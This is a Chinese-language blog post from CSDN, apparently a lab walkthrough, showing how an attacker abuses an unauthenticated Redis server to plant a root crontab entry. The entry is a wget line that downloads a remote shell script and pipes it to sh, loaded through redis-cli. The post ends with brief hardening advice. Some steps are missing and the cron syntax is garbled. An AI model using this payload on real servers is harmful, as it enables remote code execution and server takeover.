未授权访问的Redis服务02

最新推荐文章于 2024-07-16 18:47:50 发布
最新推荐文章于 2024-07-16 18:47:50 发布
阅读量211 收藏
点赞数 1
分类专栏: Kail Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Snoopied/article/details/82796189
版权

Redis服务器在初始情况下,并未配置有crontabs相关的计划任务,可在/var/spool/cron/crontabs目录下查看到无文件。

也可以进入编辑模式,发现并无计划任务,生成的root文件中还未做任何配置。

crontab -e

 

 

攻击方任意创建文件,

vi 1.txt

编写命令

***** wget -q -O - http://*/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_23610.sh | sh > /dev/null 2>&1

接着

(echo -e "\n\n";cat 1.txt;echo -e "\n\n") > foo.txt
cat /root/foo.txt | ./redis-cli -h 192.168.23.128 -x set a

完成之后,可以在Redis服务器中,查看到/var/spool/cron/crontas中的root文件已经被攻击方的计划任务所覆盖。

 

 

 

 

防范的点:

1、修改Redis服务的默认端口6379

2、设置密码

3、注意慎用root权限去启动Redis服务

4、服务绑定在0.0.0.0,黑客很容易从外网访问到

Snoopied
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权访问
xuanlanxiao的博客
05-10 468
攻击者在授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh/authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。可以简单看一下这些,原因很简单,因为centos7自身存在防火墙,会将redis默认端口6379隐藏,不允许外界访问,所以这里kali访问失败,我们关掉centos7的防火墙再试一试。自己搭建的靶场可以拉拽redis压缩包进入虚拟机里。
redis_授权访问
scu_hacker博客
01-13 7749
本文介绍redis授权访问的4种利用方式
02-Redis授权访问漏洞
qq_57410330的博客
07-16 861
详谈redis授权访问漏洞,原理、利用及加固方式
redis授权访问
san3144393495的博客
06-15 1275
redis非关系型数据库。
redis授权访问
尘玥的故事
06-13 315
redis 默认情况下,绑定在 0.0.0.0:6379,若没有采用相关的策略,如添加防火墙规则避免其他非信任来源 ip 访问等,会将 redis 服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 redis 以及读取 redis 的数据。
redis授权访问漏洞
Naive的博客
05-28 1434
Redis安装后,如果绑定在,并且没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的。
Redis 授权访问
qq_61553520的博客
05-17 520
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis
Redis--弱口令授权访问漏洞
热门推荐
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
05-19 1万+
Redis中存在授权访问漏洞,该漏洞源于程序在默认配置下会绑定在6379端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序没有开启认证选项端口对外开放时,攻击者可借助目标服务访问权限利用该漏洞授权访问Redis并读取Redis的数据,在服务器上写入公钥,进而使用对应的私钥直接登录目标服务器。
Redis授权访问漏洞
周星星的博客
08-22 1358
Redis授权访问漏洞复现以及利用
Redis授权访问漏洞复现
qq_57817668的博客
06-10 1021
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSIC语言编写、支络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问配合SSH key文件利用详解
09-09
除了SSH key利用,授权访问Redis还可能导致以下危害: a) 数据泄露:攻击者可以直接读取Redis中的数据,包括敏感信息如用户密码、个人信息等。 b) 代码执行:Redis支持Lua脚本,攻击者可以通过注入恶意脚本来执行...
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
开题报告电影票订票APP的设计与实现 已通过开题答辩的.doc
07-30
近些年的电影在人们文娱活动中占据重要地位,另外,由于人们的生活越来越富有,越来越多的人们不再选择在家里看电影,而是选择去电影院看电影。但是,以往的售票方式是需要工作人员一张张的录入到账户薄中的,这一模式已不再适应现在的实际情况,因为手动的操作不仅繁琐还容易存在差错。随着电子商务的发展,网络购票已经成为一种趋势,电子影票也已经慢慢走入人们的生活。目前,网票网作为国内首家全国性的网上选座购买电影票平台完全实现网上/手机查看影讯、自助选座、网银支付、自助验票全自助化营运模式。
Magene_C506_1722330141_905661_1722351868.fit
最新发布
07-30
Magene_C506_1722330141_905661_1722351868.fit
麻雀搜索算法SSA-CNN-BiLSTM-Mutilhead-Attention多变量时序预测含源码 5631.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-BiLSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-BiLSTM-Mutilhead-Attention回归预测
开题报告 二手手机收售系统【答辩高分内容】.doc
07-30
当换手机变成如“女人换衣服”般的容易,你被换下的那款二手手机究竟流向何处,才能释放其最大经济价值?某环保组织曾批露一组数据——每年,中国都会产生230万吨电子垃圾,仅次于美国的300万吨,是世界第二大电子垃圾生产国,并且还以年均20%的速度增加。另外据不完全统计,目前全国仅闲置手机就有10亿多部,并且每年新增3至5亿部。机遇与危机并存 据统计,我国手机用户数量现已达11.46亿。仅去年一年,全国就销售4.25亿部新手机,同时有近4亿部手机被淘汰。在这个手机更新换代比眨眼还快的年代,我国旧手机的回收和无害化处理措施却没能跟上,不少淘汰下来的旧手机都面临“无处可去”的尴尬。
KeePass密码管理器
07-30
KeePass是一个开源的密码管理器,它允许用户存储和管理他们的密码、证书、银行账户、信用卡信息等敏感数据。以下是一些关于KeePass的要点: 安全性:KeePass使用强大的加密算法来保护存储的数据,例如AES或Twofish。这意味着只有知道主密码或拥有主密钥文件的用户才能访问数据库。 跨平台:KeePass有多个版本,包括KeePass 2.x(适用于Windows)和KeePassXC(适用于Linux和macOS),它们都可以免费使用。 数据库:KeePass使用自己的数据库格式来存储密码,这使得用户可以创建复杂的数据库结构,包括分组、子分组和标签。 便携性:KeePass数据库可以存储在任何地方,包括U盘或云存储服务,使得用户可以随时随地访问他们的密码。 自动填充:KeePass可以集成到大多数现代浏览器中,自动填充登录表单,减少手动输入密码的需求。 密码生成器:KeePass内置了密码生成器,可以生成强大且难以猜测的密码。
车牌识别matlab源程序本例演示了如何用matlab进行图像识别,适合对matlab
07-30
车牌识别matlab源程序本例演示了如何用matlab进行图像识别,适合对matlab和图像处理有一定基础的爱好者学习。br将文件放于matlab目录下work文件夹中运行_rezip1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值